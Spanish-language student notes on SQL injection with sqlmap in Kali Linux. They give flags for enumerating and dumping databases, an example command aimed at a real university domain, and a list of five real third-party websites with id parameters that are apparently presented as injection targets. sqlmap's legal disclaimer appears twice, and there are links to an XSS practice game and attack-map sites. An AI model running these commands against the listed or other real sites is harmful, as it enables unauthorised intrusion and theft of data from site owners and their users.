Sql Injection

Ejercicios Kali-Linux

sqlmap
-u //url
--dbs  //obtener info de bases de datos
-D //establecer nombre base de datos
--tables //obteber info de las tablas de una base de datos -D
-T //establecer nombre de tabla
--columns //obtener info de columnas de una tabla determinada -T
--dump //obtener info

ejemplo: sqlmap -u unitec.edu --dbs

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual 
consent is illegal. It is the end user's responsibility to obey all applicable local, 
state and federal laws. Developers assume no liability and are not responsible for 
any misuse or damage caused by this program

kali - sqlmap

http://www.irishsanghatrust.ie/news.php?id=33
http://www.energias4e.com/editorial.php?id=3295 (brute force sql-injection dbs)
http://ngabrie.com/datos.php?id=5
http://www.suelosolar.com/presupuestos/index00.asp?idp=10
http://clae-la.org/view.php?id=42

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual 
consent is illegal. It is the end user's responsibility to obey all applicable local, 
state and federal laws. Developers assume no liability and are not responsible for 
any misuse or damage caused by this program

XSS

https://xss-game.appspot.com/

Adicional

DoS & DDoS

http://map.norsecorp.com/

https://cybermap.kaspersky.com/

Adicional